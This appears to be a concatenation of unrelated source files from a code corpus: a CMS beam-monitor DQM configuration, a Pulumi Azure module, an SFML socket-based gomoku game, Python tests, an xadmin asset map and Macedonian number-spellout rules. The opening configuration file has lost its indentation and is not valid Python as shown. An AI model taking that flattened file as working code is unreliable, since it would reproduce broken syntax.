#from DQM.Integration.config.fileinputsource_cfi import options
#--------------------------
# HLT Filter
# 0=random, 1=physics, 2=calibration, 3=technical
#--------------------------
process.hltTriggerTypeFilter = cms.EDFilter("HLTTriggerTypeFilter",
SelectedTriggerType = cms.int32(1)
)
#-----------------------------
# DQM Live Environment
#-----------------------------
process.load("DQM.Integration.config.environment_cfi")
process.dqmEnv.subSystemFolder = 'BeamMonitor'
process.dqmSaver.tag = 'BeamMonitor'
process.dqmSaver.runNumber = options.runNumber
process.dqmSaverPB.tag = 'BeamMonitor'
process.dqmSaverPB.runNumber = options.runNumber
#-----------------------------
# BeamMonitor
#-----------------------------
process.load("DQM.BeamMonitor.BeamMonitor_cff")
#---------------
# Calibration
#---------------
# Condition for P5 cluster
process.load("DQM.Integration.config.FrontierCondition_GT_cfi")
process.GlobalTag.DBParameters.authenticationPath = cms.untracked.string('.')
# Condition for lxplus: change and possibly customise the GT
#from Configuration.AlCa.GlobalTag import GlobalTag as gtCustomise
#process.GlobalTag = gtCustomise(process.GlobalTag, 'auto:run2_data', '')
# Change Beam Monitor variables
process.dqmBeamMonitor.useLockRecords = cms.untracked.bool(useLockRecords)
if process.dqmRunConfig.type.value() == "production":
process.dqmBeamMonitor.BeamFitter.WriteAscii = True
process.dqmBeamMonitor.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.txt'
process.dqmBeamMonitor.BeamFitter.WriteDIPAscii = True
process.dqmBeamMonitor.BeamFitter.DIPFileName = '/nfshome0/dqmpro/BeamMonitorDQM/BeamFitResults.txt'
else:
process.dqmBeamMonitor.BeamFitter.WriteAscii = False
process.dqmBeamMonitor.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.txt'
process.dqmBeamMonitor.BeamFitter.WriteDIPAscii = True
process.dqmBeamMonitor.BeamFitter.DIPFileName = '/nfshome0/dqmdev/BeamMonitorDQM/BeamFitResults.txt'
process.dqmcommon = cms.Sequence(process.dqmEnv
* process.dqmSaver*process.dqmSaverPB)
process.monitor = cms.Sequence(process.dqmBeamMonitor)
#-----------------------------------------------------------
# process customizations included here
from DQM.Integration.config.online_customizations_cfi import *
process = customise(process)
#--------------------------
# Proton-Proton Stuff
#--------------------------
if (process.runType.getRunType() == process.runType.pp_run or
process.runType.getRunType() == process.runType.pp_run_stage1 or
process.runType.getRunType() == process.runType.cosmic_run or
process.runType.getRunType() == process.runType.cosmic_run_stage1 or
process.runType.getRunType() == process.runType.hpu_run or
process.runType.getRunType() == process.runType.hi_run):
print("[beamhlt_dqm_sourceclient-live_cfg]:: Running pp")
process.load("RecoVertex.BeamSpotProducer.BeamSpot_cfi")
process.dqmBeamMonitor.monitorName = 'BeamMonitor'
process.dqmBeamMonitor.OnlineMode = True
process.dqmBeamMonitor.recordName = BSOnlineRecordName
process.dqmBeamMonitor.resetEveryNLumi = 5
process.dqmBeamMonitor.resetPVEveryNLumi = 5
process.dqmBeamMonitor.PVFitter.minNrVerticesForFit = 20
process.dqmBeamMonitor.PVFitter.minVertexNdf = 10
# some inputs to BeamMonitor
if(process.runType.getRunType() == process.runType.hi_run):
process.dqmBeamMonitor.BeamFitter.TrackCollection = 'hltPFMuonMergingPPOnAA'
process.dqmBeamMonitor.primaryVertex = 'hltVerticesPFFilterPPOnAA'
process.dqmBeamMonitor.PVFitter.VertexCollection = 'hltVerticesPFFilterPPOnAA'
else:
process.dqmBeamMonitor.BeamFitter.TrackCollection = 'hltPFMuonMerging'
process.dqmBeamMonitor.primaryVertex = 'hltVerticesPFFilter'
process.dqmBeamMonitor.PVFitter.VertexCollection = 'hltVerticesPFFilter'
    # keep checking this with new releases; it is expected to stay close to 1
process.dqmBeamMonitor.PVFitter.errorScale = 0.95
    # Trigger names for selecting the PV for DIP publication; no wildcard needed here:
    # it will pick all triggers whose names contain these strings
    process.dqmBeamMonitor.jetTrigger = cms.untracked.vstring(
        "HLT_HT300_Beamspot",
"HLT_PAZeroBias_v", "HLT_ZeroBias_", "HLT_QuadJet",
"HLT_HI")
process.dqmBeamMonitor.hltResults = "TriggerResults::HLT"
#---------
# Upload BeamSpotOnlineObject (HLTRcd) to CondDB
if unitTest == False:
process.OnlineDBOutputService = cms.Service("OnlineDBOutputService",
DBParameters = cms.PSet(
messageLevel = cms.untracked.int32(0),
authenticationPath = cms.untracked.string('.')
),
# Upload to CondDB
connect = cms.string('oracle://cms_orcon_prod/CMS_CONDITIONS'),
preLoadConnectionString = cms.untracked.string('frontier://FrontierProd/CMS_CONDITIONS'),
runNumber = cms.untracked.uint64(options.runNumber),
omsServiceUrl = cms.untracked.string(BSOnlineOmsServiceUrl),
writeTransactionDelay = cms.untracked.uint32(options.transDelay),
latency = cms.untracked.uint32(2),
autoCommit = cms.untracked.bool(True),
saveLogsOnDB = cms.untracked.bool(True),
jobName = cms.untracked.string(BSOnlineJobName), # name of the DB log record
toPut = cms.VPSet(cms.PSet(
record = cms.string(BSOnlineRecordName),
tag = cms.string(BSOnlineTag),
timetype = cms.untracked.string('Lumi'),
onlyAppendUpdatePolicy = cms.untracked.bool(True)
)),
frontierKey = cms.untracked.string(options.runUniqueKey)
)
else:
process.OnlineDBOutputService = cms.Service("OnlineDBOutputService",
DBParameters = cms.PSet(
messageLevel = cms.untracked.int32(0),
authenticationPath = cms.untracked.string('.')
),
# Upload to CondDB
connect = cms.string('sqlite_file:BeamSpotOnlineHLT.db'),
preLoadConnectionString = cms.untracked.string('sqlite_file:BeamSpotOnlineHLT.db'),
runNumber = cms.untracked.uint64(options.runNumber),
lastLumiFile = cms.untracked.string('last_lumi.txt'),
writeTransactionDelay = cms.untracked.uint32(options.transDelay),
latency = cms.untracked.uint32(2),
autoCommit = cms.untracked.bool(True),
toPut = cms.VPSet(cms.PSet(
record = cms.string(BSOnlineRecordName),
tag = cms.string(BSOnlineTag),
timetype = cms.untracked.string('Lumi'),
onlyAppendUpdatePolicy = cms.untracked.bool(True)
)),
frontierKey = cms.untracked.string(options.runUniqueKey)
)
print("Configured frontierKey", options.runUniqueKey)
process.p = cms.Path( process.hltTriggerTypeFilter
* process.dqmcommon
* process.offlineBeamSpot
* process.monitor )
|
py | 7dfab138c48f3f066f1fff248fb075f4ae3cfd1f | # -*- coding: utf-8 -*-
""" Top-level package for coal_node."""
|
py | 7dfab474517689dcee4ed7890692e18914e4e693 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from ._enums import *
from .get_policy_assignment import *
from .get_policy_definition import *
from .get_policy_definition_at_management_group import *
from .get_policy_set_definition import *
from .get_policy_set_definition_at_management_group import *
from .policy_assignment import *
from .policy_definition import *
from .policy_definition_at_management_group import *
from .policy_set_definition import *
from .policy_set_definition_at_management_group import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from ... import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "azure-nextgen:authorization/v20190901:PolicyAssignment":
return PolicyAssignment(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-nextgen:authorization/v20190901:PolicyDefinition":
return PolicyDefinition(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-nextgen:authorization/v20190901:PolicyDefinitionAtManagementGroup":
return PolicyDefinitionAtManagementGroup(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-nextgen:authorization/v20190901:PolicySetDefinition":
return PolicySetDefinition(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-nextgen:authorization/v20190901:PolicySetDefinitionAtManagementGroup":
return PolicySetDefinitionAtManagementGroup(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("azure-nextgen", "authorization/v20190901", _module_instance)
_register_module()
|
py | 7dfab4c176f1a35fdcbe7a8aec81f00323d20297 | from exh.prop import Or, And
from exh.fol import Existential, Universal
from exh.scales import SimpleScales
# Default scalar scales
scales = SimpleScales([{Or, And}, {Existential, Universal}])
# Whether Exh computes innocent inclusion by default
ii_on = False
# Whether automatic alternatives use sub-constituent alternatives by default
sub = True
# Whether the prejacent of Exh is an alternative to Exh when "sub" is True ; we don't derive Free Choice if this is set to True
prejacent_alternative_to_exh = False
# The minimal number of alternatives beyond which the "diagnose" method starts displaying them as a bullet-point list
cutoff_inline_to_list = 5 |
py | 7dfab4ce7ed7fe0fc6074f2a8c3fd71d550afa90 | #
# Copyright 2000-2025 riteme
#
import sys
import time
import socket
import threading
from math import *
from sfml.window import *
from sfml.graphics import *
from sfml.system import *
class Game(object):
WINDOW_WIDTH = 570
WINDOW_HEIGHT = 570
WINDOW_TITLE = "Chess"
CHESS_RADIUS = 15
POINT_RADIUS = 3
CHESS_NONE = 0
CHESS_WHITE = 1
CHESS_BLACK = 2
def __init__(self):
super(Game, self).__init__()
setting = ContextSettings()
setting.antialiasing_level = 4
self.window = RenderWindow(
mode=VideoMode(self.WINDOW_WIDTH, self.WINDOW_HEIGHT),
title=self.WINDOW_TITLE,
style=Style.TITLEBAR | Style.CLOSE,
settings=setting
)
self.window.framerate_limit = 60
self.setup_board()
self.setup_chess()
# Utility
def setup_network(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.data = None
def connect_to(self, address, port):
self.socket.connect((address, port))
def bind_to(self, address, port):
self.socket.bind((address, port))
self.socket.listen(1)
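    # Wire protocol used by serve() and listen() below: peers exchange plain
    # ASCII messages of the form "place <x> <y>"; the host moves first, and
    # each side stops relaying once a winning line has been detected locally.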
def serve(self):
# Wait for connection
connection, address = self.socket.accept()
# Wait for mouse input
self.disabled = False
while self.data is None:
time.sleep(0.01)
connection.sendall(
("place %s %s" % self.data).encode("ascii")
)
# Already won
if self.finished:
return
print("first one at %s, %s" % self.data)
while True:
# Wait for white
self.disabled = True
message = connection.recv(1024).decode("ascii")
tokens = message.strip().split(" ")
command = tokens[0].lower()
if command == "place":
x = int(tokens[1])
y = int(tokens[2])
print("get %s, %s" % (x, y))
self.place(x, y, Color.BLACK)
else:
raise RuntimeError("Unexpected command: %s" % (command))
# Already finished
if self.finished:
break
# Wait for mouse input
self.disabled = False
self.data = None
while self.data is None:
time.sleep(0.01)
print("put %s, %s" % self.data)
connection.sendall(
("place %s %s" % self.data).encode("ascii")
)
# Already won
if self.finished:
break
connection.close()
def listen(self):
self.disabled = True
while True:
# Wait for black
message = self.socket.recv(1024).decode("ascii")
tokens = message.strip().split(" ")
command = tokens[0].lower()
if command == "place":
x = int(tokens[1])
y = int(tokens[2])
print("get %s, %s" % (x, y))
self.place(x, y, Color.BLACK)
else:
raise RuntimeError("Unexpected command!")
# Already finished
if self.finished:
return
# Wait for mouse input
self.disabled = False
self.data = None
while self.data is None:
time.sleep(0.01)
self.disabled = True
print("put %s, %s" % self.data)
self.socket.sendall(
("place %s %s" % self.data).encode("ascii")
)
# Already won
if self.finished:
return
self.socket.close()
def setup_server(self):
self.server = threading.Thread(target=Game.serve, args=(self, ))
self.server.start()
def setup_client(self):
self.listener = threading.Thread(target=Game.listen, args=(self, ))
self.listener.start()
def place(self, i, j, color):
self.data = None
if self.chess[i][j].fill_color == Color.TRANSPARENT:
self.chess[i][j].fill_color = self.current_color
self.history.append((i, j))
self.last_block.position = self.to_position(i, j)
self.last_block.position -= (self.CHESS_RADIUS, self.CHESS_RADIUS)
result = self.check_winner()
if not result is None:
self.finish(result)
else:
self.change_color()
self.data = (i, j)
def setup_board(self):
self.board = VertexArray(PrimitiveType.LINES)
for i in range(0, 19):
self.board.append(
Vertex(Vector2(
self.CHESS_RADIUS + i * 2 * self.CHESS_RADIUS,
self.CHESS_RADIUS
), Color.BLACK
)
)
self.board.append(
Vertex(Vector2(
self.CHESS_RADIUS + i * 2 * self.CHESS_RADIUS,
self.CHESS_RADIUS + 36 * self.CHESS_RADIUS
), Color.BLACK
)
)
self.board.append(
Vertex(Vector2(
self.CHESS_RADIUS,
self.CHESS_RADIUS + i * 2 * self.CHESS_RADIUS
), Color.BLACK
)
)
self.board.append(
Vertex(Vector2(
self.CHESS_RADIUS + 36 * self.CHESS_RADIUS,
self.CHESS_RADIUS + i * 2 * self.CHESS_RADIUS
), Color.BLACK
)
)
self.circles = []
POSITIONS = [
(3, 3), (3, 9), (3, 15),
(9, 3), (9, 9), (9, 15),
(15, 3), (15, 9), (15, 15)
]
for point in POSITIONS:
x, y = point
circle = CircleShape()
circle.radius = self.POINT_RADIUS
circle.fill_color = Color.BLACK
circle.position = (
self.CHESS_RADIUS * 2 * x + self.CHESS_RADIUS - self.POINT_RADIUS,
self.CHESS_RADIUS * 2 * y + self.CHESS_RADIUS - self.POINT_RADIUS
)
self.circles.append(circle)
def setup_chess(self):
self.chess = []
for i in range(0, 19):
self.chess.append([])
for j in range(0, 19):
chess = CircleShape(point_count=128)
chess.radius = self.CHESS_RADIUS
chess.fill_color = Color.TRANSPARENT
chess.position = self.to_position(i, j)
chess.position -= (self.CHESS_RADIUS, self.CHESS_RADIUS)
self.chess[-1].append(chess)
self.current_block = RectangleShape()
self.current_block.size = (2 * self.CHESS_RADIUS, 2 * self.CHESS_RADIUS)
self.current_block.position = (-100, -100)
self.current_block.fill_color = Color(200, 200, 200)
self.last_block = RectangleShape()
self.last_block.size = (2 * self.CHESS_RADIUS, 2 * self.CHESS_RADIUS)
self.last_block.position = (-100, -100)
self.last_block.fill_color = Color.TRANSPARENT
self.last_block.outline_thickness = 2
self.last_block.outline_color = Color.RED
self.current_color = Color.BLACK
self.disabled = False
self.finished = False
self.history = []
def change_color(self):
if self.current_color == Color.WHITE:
self.current_color = Color.BLACK
else:
self.current_color = Color.WHITE
def to_position(self, i, j):
return (
self.CHESS_RADIUS * 2 * i + self.CHESS_RADIUS,
self.CHESS_RADIUS * 2 * j + self.CHESS_RADIUS
)
def to_index(self, x, y):
return (
int(x / (self.CHESS_RADIUS * 2)),
int(y / (self.CHESS_RADIUS * 2))
)
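    # Worked example of the coordinate mapping above: with CHESS_RADIUS = 15,
    # board cell (3, 9) maps to pixel centre (105, 285) via to_position, and
    # to_index(105, 285) maps it back to cell (3, 9).
    # check_winner below scans every occupied cell along the 8 directions in
    # dx/dy; finding 4 further stones of the same colour (5 in a row) decides the game.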
def check_winner(self):
dx = [0, 1, 1, 1, 0, -1, -1, -1]
dy = [-1, -1, 0, 1, 1, 1, 0, -1]
for i in range(0, 19):
for j in range(0, 19):
for k in range(0, len(dx)):
target = self.chess[i][j].fill_color
if target == Color.TRANSPARENT:
break
cx = i + dx[k]
cy = j + dy[k]
count = 0
while count < 4 and 0 <= cx and cx <= 18 and 0 <= cy and cy <= 18:
if self.chess[cx][cy].fill_color == target:
count += 1;
cx += dx[k]
cy += dy[k]
else:
break
if count == 4:
return (i, j, cx - dx[k], cy - dy[k], target)
return None
def finish(self, result):
self.disabled = True
self.finished = True
x1, y1, x2, y2, color = result
x1, y1 = self.to_position(x1, y1)
x2, y2 = self.to_position(x2, y2)
self.line = VertexArray(PrimitiveType.LINES, 2)
self.line[0] = Vertex(
Vector2(x1, y1), Color.RED
)
self.line[1] = Vertex(
Vector2(x2, y2), Color.RED
)
self.info = Text()
self.info.position = (0, 0)
self.info.character_size = 30
self.info.font = Font.from_file("ubuntu.ttf")
if color == Color.WHITE:
self.info.string = "White win!"
self.info.color = Color.WHITE
else:
self.info.string = "Black win!"
self.info.color = Color.BLACK
# Events
def do_events(self):
for event in self.window.events:
if type(event) is CloseEvent:
self.window.close()
elif type(event) is MouseButtonEvent:
if self.disabled or event.pressed:
continue
elif event.button == Mouse.LEFT:
mx, my = event.position
i, j = self.to_index(mx, my)
self.place(i, j, self.current_color)
elif type(event) is MouseMoveEvent:
mx, my = event.position
i, j = self.to_index(mx, my)
self.current_block.position = self.to_position(i, j)
self.current_block.position -= (self.CHESS_RADIUS, self.CHESS_RADIUS)
# elif type(event) is KeyEvent:
# if not event.released:
# continue
# if event.code == window.Keyboard.ESCAPE:
# self.setup_chess()
# elif event.code == window.Keyboard.Z and event.control:
# if len(self.history) > 0:
# i, j = self.history.pop()
# self.chess[i][j].fill_color = Color.TRANSPARENT
# Updating
def update(self):
pass
# Rendering
def draw_board(self):
self.window.draw(self.board)
for circle in self.circles:
self.window.draw(circle)
def draw_chess(self):
for line in self.chess:
for chess in line:
self.window.draw(chess)
def render(self):
self.window.clear(Color(205, 154, 61))
self.window.draw(self.current_block)
self.draw_board()
self.draw_chess()
self.window.draw(self.last_block)
if self.finished:
self.window.draw(self.line)
self.window.draw(self.info)
self.window.display()
def run(self):
while self.window.is_open:
self.do_events()
self.update()
self.render()
if __name__ == "__main__":
game = Game()
if len(sys.argv) > 1:
command = sys.argv[1]
address = sys.argv[2]
port = int(sys.argv[3])
game.setup_network()
if command == "create":
game.bind_to(address, port)
game.setup_server()
elif command == "join":
game.connect_to(address, port)
game.setup_client()
else:
print("(error) Unknown command: {}".format(command))
game.run()
|
py | 7dfab4e4ed427a224348d58d7418a339ae57032d | from textwrap import dedent
from nose.tools import eq_
from douglas.plugins import rst_parser
from douglas.tests import PluginTest
class TagsTest(PluginTest):
def setUp(self):
PluginTest.setUp(self, rst_parser)
def test_parsing(self):
fn = self.create_file('entries/blogpost.rst', dedent("""\
The Title
#meta1 val1
This is my blog post
====================
**so amazing**
"""))
ret = rst_parser.parse_rst_file(fn, self.request)
eq_(ret,
{'title': 'The Title',
'body': ('<div class="section" id="this-is-my-blog-post">\n'
'<h1>This is my blog post</h1>\n'
'<p><strong>so amazing</strong></p>\n'
'</div>\n'),
'meta1': 'val1'})
def test_break(self):
fn = self.create_file('entries/blogpost.rst', dedent("""\
The Title
#meta1 val1
first part
.. break::
second part
"""))
ret = rst_parser.parse_rst_file(fn, self.request)
eq_(ret,
{'title': 'The Title',
'summary': '<p>first part</p>\n',
'body': '<p>first part</p>\n<p>second part</p>\n',
'meta1': 'val1'})
|
py | 7dfab593dd1b6b152bba39074d2a2dbd9465fd2b | import os
from app.database.models import Event, User
from app.routers import profile
from sqlalchemy.orm import Session
class TestHolidaysImport:
HOLIDAYS = '/profile/holidays/import'
@staticmethod
def test_import_holidays_page_exists(client):
resp = client.get(TestHolidaysImport.HOLIDAYS)
assert resp.ok
assert b'Import holidays using ics file' in resp.content
def test_get_holidays(self, session: Session, user: User):
current_folder = os.path.dirname(os.path.realpath(__file__))
resource_folder = os.path.join(current_folder, 'resources')
test_file = os.path.join(resource_folder, 'ics_example.txt')
with open(test_file) as file:
ics_content = file.read()
holidays = profile.get_holidays_from_file(ics_content, session)
profile.save_holidays_to_db(holidays, session)
assert len(session.query(Event).all()) == 4
def test_wrong_file_get_holidays(self, session: Session, user: User):
current_folder = os.path.dirname(os.path.realpath(__file__))
resource_folder = os.path.join(current_folder, 'resources')
test_file = os.path.join(resource_folder, 'wrong_ics_example.txt')
with open(test_file) as file:
ics_content = file.read()
holidays = profile.get_holidays_from_file(ics_content, session)
profile.save_holidays_to_db(holidays, session)
assert len(session.query(Event).all()) == 0
|
py | 7dfab5a1178b562ed9b2af5e33097dc52c617c96 | """
Configuration for docs
"""
# source_link = "https://github.com/[org_name]/app2"
# docs_base_url = "https://[org_name].github.io/app2"
# headline = "App that does everything"
# sub_heading = "Yes, you got that right the first time, everything"
def get_context(context):
context.brand_html = "App2"
|
py | 7dfab711a785edd9fa0964fa0762b2fb598b2a6c |
vendors = {
"bootstrap": {
'js': {
'dev': 'xadmin/vendor/bootstrap/js/bootstrap.js',
'production': 'xadmin/vendor/bootstrap/js/bootstrap.min.js',
'cdn': 'http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js'
},
'css': {
'dev': 'xadmin/vendor/bootstrap/css/bootstrap.css',
'production': 'xadmin/vendor/bootstrap/css/bootstrap.css',
'cdn': 'http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css'
},
'responsive': {'css':{
'dev': 'xadmin/vendor/bootstrap/bootstrap-responsive.css',
'production': 'xadmin/vendor/bootstrap/bootstrap-responsive.css'
}}
},
'jquery': {
"js": {
'dev': 'xadmin/vendor/jquery/jquery.js',
'production': 'xadmin/vendor/jquery/jquery.min.js',
}
},
'jquery-ui-effect': {
"js": {
'dev': 'xadmin/vendor/jquery-ui/jquery.ui.effect.js',
'production': 'xadmin/vendor/jquery-ui/jquery.ui.effect.min.js'
}
},
'jquery-ui-sortable': {
"js": {
'dev': [
'xadmin/vendor/jquery-ui/jquery.ui.sortable.js'
],
'production': [
'xadmin/vendor/jquery-ui/jquery.ui.sortable.min.js'
]
}
},
"font-awesome": {
"css": {
'dev': 'xadmin/vendor/font-awesome/css/font-awesome.css',
'production': 'xadmin/vendor/font-awesome/css/font-awesome.min.css',
}
},
"timepicker": {
"css": {
'dev': 'xadmin/vendor/bootstrap-timepicker/css/bootstrap-timepicker.css',
'production': 'xadmin/vendor/bootstrap-timepicker/css/bootstrap-timepicker.min.css',
},
"js": {
'dev': 'xadmin/vendor/bootstrap-timepicker/js/bootstrap-timepicker.js',
'production': 'xadmin/vendor/bootstrap-timepicker/js/bootstrap-timepicker.min.js',
}
},
"clockpicker": {
"css": {
'dev': 'xadmin/vendor/bootstrap-clockpicker/bootstrap-clockpicker.css',
'production': 'xadmin/vendor/bootstrap-clockpicker/bootstrap-clockpicker.min.css',
},
"js": {
'dev': 'xadmin/vendor/bootstrap-clockpicker/bootstrap-clockpicker.js',
'production': 'xadmin/vendor/bootstrap-clockpicker/bootstrap-clockpicker.min.js',
}
},
"datepicker": {
"css": {
'dev': 'xadmin/vendor/bootstrap-datepicker/css/datepicker.css'
},
"js": {
'dev': 'xadmin/vendor/bootstrap-datepicker/js/bootstrap-datepicker.js',
}
},
"flot": {
"js": {
'dev': ['xadmin/vendor/flot/jquery.flot.js', 'xadmin/vendor/flot/jquery.flot.pie.js', 'xadmin/vendor/flot/jquery.flot.time.js',
'xadmin/vendor/flot/jquery.flot.resize.js','xadmin/vendor/flot/jquery.flot.aggregate.js','xadmin/vendor/flot/jquery.flot.categories.js']
}
},
"image-gallery": {
"css": {
'dev': 'xadmin/vendor/bootstrap-image-gallery/css/bootstrap-image-gallery.css',
'production': 'xadmin/vendor/bootstrap-image-gallery/css/bootstrap-image-gallery.css',
},
"js": {
'dev': ['xadmin/vendor/load-image/load-image.js', 'xadmin/vendor/bootstrap-image-gallery/js/bootstrap-image-gallery.js'],
'production': ['xadmin/vendor/load-image/load-image.min.js', 'xadmin/vendor/bootstrap-image-gallery/js/bootstrap-image-gallery.js']
}
},
"select": {
"css": {
'dev': ['xadmin/vendor/select2/select2.css', 'xadmin/vendor/selectize/selectize.css', 'xadmin/vendor/selectize/selectize.bootstrap3.css'],
},
"js": {
'dev': ['xadmin/vendor/selectize/selectize.js', 'xadmin/vendor/select2/select2.js', 'xadmin/vendor/select2/select2_locale_%(lang)s.js'],
'production': ['xadmin/vendor/selectize/selectize.min.js', 'xadmin/vendor/select2/select2.min.js', 'xadmin/vendor/select2/select2_locale_%(lang)s.js']
}
},
"multiselect": {
"css": {
'dev': 'xadmin/vendor/bootstrap-multiselect/css/bootstrap-multiselect.css',
},
"js": {
'dev': 'xadmin/vendor/bootstrap-multiselect/js/bootstrap-multiselect.js',
}
},
"snapjs": {
"css": {
'dev': 'xadmin/vendor/snapjs/snap.css',
},
"js": {
'dev': 'xadmin/vendor/snapjs/snap.js',
}
},
}
|
py | 7dfab7a3403fcee5a997284903558ab259a327df | # Function to get unique values from an attribute field.
def get_unique(datasource, layer_name, field_name):
sql = 'SELECT DISTINCT {0} FROM {1}'.format(field_name, layer_name)
lyr = datasource.ExecuteSQL(sql)
values = []
for row in lyr:
values.append(row.GetField(field_name))
datasource.ReleaseResultSet(lyr)
return values
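
# A minimal usage sketch (an addition, not part of the original module). It
# assumes GDAL/OGR is installed and uses placeholder datasource, layer and
# field names.
if __name__ == '__main__':
    from osgeo import ogr
    ds = ogr.Open('data.shp')  # placeholder path
    if ds is not None:
        print(get_unique(ds, 'data', 'name'))  # placeholder layer/field names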
|
py | 7dfab8c615a5d699a002304b4c569b19b8fb4aa3 | info = {
"%spellout-cardinal-feminine": {
"0": "нула;",
"1": "една;",
"2": "две;",
"(3, 19)": "=%spellout-cardinal-masculine=;",
"(20, 29)": "дваесет[ и >>];",
"(30, 39)": "триесет[ и >>];",
"(40, 49)": "четириесет[ и >>];",
"(50, 59)": "педесет[ и >>];",
"(60, 69)": "шеесет[ и >>];",
"(70, 79)": "седумдесет[ и >>];",
"(80, 89)": "осумдесет[ и >>];",
"(90, 99)": "деведесет[ и >>];",
"(100, 999)": "<%spellout-cardinal-feminine<сто[ >>];",
"(1000, 999999)": "<%spellout-cardinal-feminine< илјада[ >>];",
"(1000000, 999999999)": "<%spellout-cardinal-masculine< милион[ >>];",
"(1000000000, 999999999999)": "<%spellout-cardinal-masculine< милијарда[ >>];",
"(1000000000000, 999999999999999)": "<%spellout-cardinal-masculine< билион[ >>];",
"(1000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< билијарда[ >>];",
"(1000000000000000000, 'inf')": "=#,##0=;"
},
"%spellout-cardinal-masculine": {
"0": "нула;",
"1": "еден;",
"2": "два;",
"3": "три;",
"4": "четири;",
"5": "пет;",
"6": "шест;",
"7": "седум;",
"8": "осум;",
"9": "девет;",
"10": "десет;",
"11": "единаесет;",
"12": "дванаесет;",
"13": "тринаесет;",
"14": "четиринаесет;",
"15": "петнаесет;",
"16": "шеснаесет;",
"17": "седумнаесет;",
"18": "осумнаесет;",
"19": "деветнаесет;",
"(20, 29)": "дваесет[ и >>];",
"(30, 39)": "триесет[ и >>];",
"(40, 49)": "четириесет[ и >>];",
"(50, 59)": "педесет[ и >>];",
"(60, 69)": "шеесет[ и >>];",
"(70, 79)": "седумдесет[ и >>];",
"(80, 89)": "осумдесет[ и >>];",
"(90, 99)": "деведесет[ и >>];",
"(100, 999)": "<%spellout-cardinal-feminine<сто[ >>];",
"(1000, 999999)": "<%spellout-cardinal-feminine< илјада[ >>];",
"(1000000, 999999999)": "<%spellout-cardinal-masculine< милион[ >>];",
"(1000000000, 999999999999)": "<%spellout-cardinal-masculine< милијарда[ >>];",
"(1000000000000, 999999999999999)": "<%spellout-cardinal-masculine< билион[ >>];",
"(1000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< билијарда[ >>];",
"(1000000000000000000, 'inf')": "=#,##0=;"
},
"%spellout-cardinal-neuter": {
"0": "нула;",
"1": "едно;",
"2": "два;",
"(3, 19)": "=%spellout-cardinal-masculine=;",
"(20, 29)": "дваесет[ и >>];",
"(30, 39)": "триесет[ и >>];",
"(40, 49)": "четириесет[ и >>];",
"(50, 59)": "педесет[ и >>];",
"(60, 69)": "шеесет[ и >>];",
"(70, 79)": "седумдесет[ и >>];",
"(80, 89)": "осумдесет[ и >>];",
"(90, 99)": "деведесет[ и >>];",
"(100, 999)": "<%spellout-cardinal-feminine<сто[ >>];",
"(1000, 999999)": "<%spellout-cardinal-feminine< илјада[ >>];",
"(1000000, 999999999)": "<%spellout-cardinal-masculine< милион[ >>];",
"(1000000000, 999999999999)": "<%spellout-cardinal-masculine< милијарда[ >>];",
"(1000000000000, 999999999999999)": "<%spellout-cardinal-masculine< билион[ >>];",
"(1000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< билијарда[ >>];",
"(1000000000000000000, 'inf')": "=#,##0=;"
},
"%spellout-numbering": {
"(0, 'inf')": "=%spellout-cardinal-masculine=;"
},
"%spellout-numbering-year": {
"(0, 'inf')": "=%spellout-numbering=;"
}
}
|